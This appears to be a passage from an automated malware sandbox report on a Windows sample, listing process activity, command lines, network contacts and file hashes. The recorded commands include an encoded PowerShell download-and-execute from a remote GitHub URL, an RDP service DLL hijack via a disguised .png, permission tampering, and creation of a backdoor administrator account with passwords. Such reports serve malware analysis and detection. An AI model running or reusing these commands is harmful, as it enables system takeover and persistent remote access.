PID 516 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1196 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1196 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1196 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1416 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1416 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1416 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 516 wrote to memory of 840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 516 wrote to memory of 840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 516 wrote to memory of 1040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 516 wrote to memory of 1040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 516 wrote to memory of 1040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 516 wrote to memory of 1020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 516 wrote to memory of 1020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 516 wrote to memory of 1020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 516 wrote to memory of 828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 516 wrote to memory of 828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 516 wrote to memory of 828 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 828 wrote to memory of 1352 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 828 wrote to memory of 1352 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 828 wrote to memory of 1352 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 516 wrote to memory of 1344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 516 wrote to memory of 1344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 516 wrote to memory of 1344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1344 wrote to memory of 1692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1344 wrote to memory of 1692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1344 wrote to memory of 1692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1692 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe

"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tql0hdgn.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC06.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCC05.tmp"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net.exe

net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc WAvm5fYw /add

C:\Windows\system32\net.exe

net.exe user wgautilacc WAvm5fYw /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc WAvm5fYw /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc WAvm5fYw

C:\Windows\system32\net.exe

net.exe user wgautilacc WAvm5fYw

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc WAvm5fYw

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 asgyyya6ychcha.xyz udp

Files

memory/1048-54-0x00000000414D0000-0x00000000418CF000-memory.dmp

memory/1048-57-0x0000000041054000-0x0000000041056000-memory.dmp

memory/1048-58-0x0000000041056000-0x0000000041057000-memory.dmp

memory/1048-56-0x0000000041052000-0x0000000041054000-memory.dmp

memory/1048-59-0x0000000041057000-0x0000000041058000-memory.dmp

memory/516-60-0x0000000000000000-mapping.dmp

memory/516-61-0x000007FEFB7B1000-0x000007FEFB7B3000-memory.dmp

memory/516-62-0x000007FEEA770000-0x000007FEEB2CD000-memory.dmp

memory/516-63-0x000000001B710000-0x000000001BA0F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

memory/516-66-0x00000000027A2000-0x00000000027A4000-memory.dmp

memory/516-67-0x00000000027A4000-0x00000000027A7000-memory.dmp

memory/516-68-0x00000000027AB000-0x00000000027CA000-memory.dmp

memory/516-65-0x00000000027A0000-0x00000000027A2000-memory.dmp

memory/1092-69-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\tql0hdgn.cmdline

MD5 bfa9eeaa9080cff20cbceca63717205a
SHA1 6828ba86aeb421c1aed495b5ed9e41e9b0095ab1
SHA256 678a1235103090b99ae5d41d209edd6af3983e99045ccf90b8ae678028de8c99
SHA512 08c1c125f7a6844ec52ac36407fac31231429f8e89349adb4121cff9d7fc0912cfba1303d08d08c414177b324cf4c591fb65c7587be5fc602e2c94ffd6c96dc5

\??\c:\Users\Admin\AppData\Local\Temp\tql0hdgn.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

memory/508-72-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSCCC05.tmp

MD5 f541329d870c5024d2b4749bf3a4666a
SHA1 eb3dc51404bf91fbc0b000191eb1bb7632cd8aa2
SHA256 8fb40691b94997c34f8435042d2db8e958a8d9f9c4f058ed59c916bd5e9cb504
SHA512 1e838e5c6ffc8b2c2a26aac8ec8e588cc253659c6d579d330d304dfc50eb75da6a546deab4727ce8724c4ea8ba874838a4659495e2684c4eaec8fcdad96934cb

C:\Users\Admin\AppData\Local\Temp\RESCC06.tmp

MD5 9000cdb870011d68ddd74226af7220ad
SHA1 a6f3d9b7050fc951b16c0fb8aa3a08a3f07961b3
SHA256 667cf1dbbc9b5b2ef0c419ff9ea5722a778f7c06a67b0cbfde8fa896f6e39242
SHA512 c318b264438afad377684d29dad4281f830ca78174678c0dade0a683ed5150d8c2dd8dc8c46e8ea3c0eb7c21e309fc384e0e6c6bf593a2133c65c93cc21f5339

C:\Users\Admin\AppData\Local\Temp\tql0hdgn.dll

MD5 23d9d54575b2b3d3d74494603462ad6c
SHA1 1cd1ddec831fc6b8bedccac342c63e6c2fe36273
SHA256 57e5d75d2ccbb52d5076e6ae74acb64018ec31734f35ed9faec511d24a038609
SHA512 18c91b3657602952d15250f439126b42b3563c2662971a356f66faadff925d5d7b1b875505188643618d9351971c734baa1cd3d3efa8547308e3899d00862a27

C:\Users\Admin\AppData\Local\Temp\tql0hdgn.pdb

MD5 d4e94d1a26ac8cdc38870bd7178924a8
SHA1 948347989b50823642fb8fbdaaea0797cf2abee8
SHA256 28f26aadee50650a856fc254f616debf87bcb86b54fd98957d789571625f3c57
SHA512 fac85d7e4b887c4875748452b774591f4abf0232ce8d7d016337b1e101b11a4911da0e192d6b1ee925180ef827b2b2399b680ec7a304df2c1e8bec81392b6b8e

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 f784c76a5f451d89ecd31dc71a8c26cb
SHA1 81b9f4163f834ea3cf133e2be9b8b81279e41c6b
SHA256 8d77e8f87f57c3cc6c5b19ea782763c6a4c3c18ee750357c050543d913e6ac9f
SHA512 5b8fd465141921c4791739fe5186b615594ae47e16c568fe6a640cb67c21aa25b0e1b5910c3eb56cf3a23ce4c6d251664e132a3007956ed3453dce3d1f713981

memory/1092-78-0x0000000002100000-0x0000000002102000-memory.dmp

memory/516-79-0x00000000027CD000-0x00000000027CE000-memory.dmp

memory/272-80-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 3deecd8e098f325312acc0cc767ebd9d
SHA1 4fcfd95eb60d1dc6a7fde6e3e709f6d0ca6ebf19
SHA256 12e520e866b11cd39cd1c122f9fba650c2ea8a981e3a598156e25b45f857f2a7
SHA512 115d3f4c4a569ffb3da38ecd0c06041e333e15d8fdd2e6e1c0b47686bd5c742c5dc4729f0838d5d41cd50eeb7499972956375d67b314f2bbc82f69f48982d390

memory/272-83-0x000007FEEA770000-0x000007FEEB2CD000-memory.dmp

memory/272-84-0x000000001B8E0000-0x000000001BBDF000-memory.dmp

memory/272-85-0x0000000002630000-0x0000000002632000-memory.dmp

memory/272-86-0x0000000002632000-0x0000000002634000-memory.dmp

memory/272-88-0x0000000002634000-0x0000000002637000-memory.dmp

memory/272-87-0x000000000263C000-0x000000000265B000-memory.dmp

memory/272-89-0x0000000002637000-0x0000000002638000-memory.dmp

memory/2020-90-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 3deecd8e098f325312acc0cc767ebd9d
SHA1 4fcfd95eb60d1dc6a7fde6e3e709f6d0ca6ebf19
SHA256 12e520e866b11cd39cd1c122f9fba650c2ea8a981e3a598156e25b45f857f2a7
SHA512 115d3f4c4a569ffb3da38ecd0c06041e333e15d8fdd2e6e1c0b47686bd5c742c5dc4729f0838d5d41cd50eeb7499972956375d67b314f2bbc82f69f48982d390

memory/2020-93-0x000007FEEA770000-0x000007FEEB2CD000-memory.dmp

memory/2020-94-0x00000000028E0000-0x00000000028E2000-memory.dmp

memory/2020-95-0x00000000028E2000-0x00000000028E4000-memory.dmp

memory/2020-96-0x00000000028E4000-0x00000000028E7000-memory.dmp

memory/2020-97-0x00000000028E7000-0x00000000028E8000-memory.dmp

memory/2020-98-0x000000001B950000-0x000000001BC4F000-memory.dmp

memory/2020-99-0x00000000028EC000-0x000000000290B000-memory.dmp

memory/1000-100-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 3deecd8e098f325312acc0cc767ebd9d
SHA1 4fcfd95eb60d1dc6a7fde6e3e709f6d0ca6ebf19
SHA256 12e520e866b11cd39cd1c122f9fba650c2ea8a981e3a598156e25b45f857f2a7
SHA512 115d3f4c4a569ffb3da38ecd0c06041e333e15d8fdd2e6e1c0b47686bd5c742c5dc4729f0838d5d41cd50eeb7499972956375d67b314f2bbc82f69f48982d390

memory/1000-103-0x000007FEEA770000-0x000007FEEB2CD000-memory.dmp

memory/1000-104-0x000000001B8F0000-0x000000001BBEF000-memory.dmp

memory/1000-105-0x0000000002510000-0x0000000002512000-memory.dmp

memory/1000-107-0x0000000002514000-0x0000000002517000-memory.dmp

memory/1000-106-0x0000000002512000-0x0000000002514000-memory.dmp

memory/1000-108-0x0000000002517000-0x0000000002518000-memory.dmp

memory/1000-109-0x000000000251C000-0x000000000253B000-memory.dmp

memory/1500-110-0x0000000000000000-mapping.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/1644-112-0x0000000000000000-mapping.dmp

memory/868-113-0x0000000000000000-mapping.dmp

memory/1828-114-0x0000000000000000-mapping.dmp

memory/1196-115-0x0000000000000000-mapping.dmp

memory/1416-116-0x0000000000000000-mapping.dmp

memory/432-117-0x0000000000000000-mapping.dmp

memory/1028-118-0x0000000000000000-mapping.dmp

memory/840-119-0x0000000000000000-mapping.dmp

memory/1040-120-0x0000000000000000-mapping.dmp

memory/1020-121-0x0000000000000000-mapping.dmp

memory/828-122-0x0000000000000000-mapping.dmp

memory/1352-123-0x0000000000000000-mapping.dmp

memory/1344-124-0x0000000000000000-mapping.dmp

memory/1692-125-0x0000000000000000-mapping.dmp

memory/1348-126-0x0000000000000000-mapping.dmp

memory/1332-127-0x0000000000000000-mapping.dmp

memory/2028-128-0x0000000000000000-mapping.dmp

memory/620-129-0x0000000000000000-mapping.dmp

memory/1760-130-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 02de1d05ec7c49607d0469e7731760c6
SHA1 39f0cddc616ab7ccfd0030f9aa257d6603373fb6
SHA256 dcb3e99447dd9c7093c425de2dc13d18342299d6b3876542c8b18542b80ec9eb
SHA512 a33b3da342c96816477347e0dfb6a54b2202990370260aa7fb3de6774c6868a9abef8ec1c794115d927432346153663a600142ca86701adaf1cde2b28f749f82

\Windows\Branding\mediasvc.png

MD5 a82cc23d45b8e1de9897fa40dbfebecb
SHA1 16590d3f0a035e0c01a9959593dd35b5d417a18e
SHA256 300f336a781a00987d35d4db230a14f96d3566ad324d8a5f9b0193095ef3d821
SHA512 b644dc69e2937ce23dd0e49f19bf1541f3e72fc9d1ff1a27d9ec009ad908fc19d8470c11dfe49a305cc9db278d684c31553107f8f4808a157e6c2a3873f5025a

memory/1852-133-0x0000000000000000-mapping.dmp

memory/1964-134-0x0000000000000000-mapping.dmp

memory/1648-135-0x0000000000000000-mapping.dmp

memory/628-136-0x0000000000000000-mapping.dmp

memory/1496-137-0x0000000000000000-mapping.dmp

memory/928-138-0x0000000000000000-mapping.dmp

memory/1116-139-0x0000000000000000-mapping.dmp

memory/604-140-0x0000000000000000-mapping.dmp

memory/1640-141-0x0000000000000000-mapping.dmp

memory/1408-142-0x0000000000000000-mapping.dmp

memory/1692-143-0x0000000000000000-mapping.dmp

memory/1772-144-0x0000000000000000-mapping.dmp

memory/1208-145-0x0000000000000000-mapping.dmp

memory/1604-146-0x0000000000000000-mapping.dmp

memory/392-147-0x0000000000000000-mapping.dmp

memory/288-148-0x0000000000000000-mapping.dmp

memory/288-150-0x000007FEEA770000-0x000007FEEB2CD000-memory.dmp

memory/288-151-0x0000000001350000-0x0000000001352000-memory.dmp

memory/288-153-0x0000000001354000-0x0000000001357000-memory.dmp

memory/288-152-0x0000000001352000-0x0000000001354000-memory.dmp

memory/288-154-0x000000000135B000-0x000000000137A000-memory.dmp

memory/1780-155-0x0000000000000000-mapping.dmp

memory/1692-156-0x0000000000000000-mapping.dmp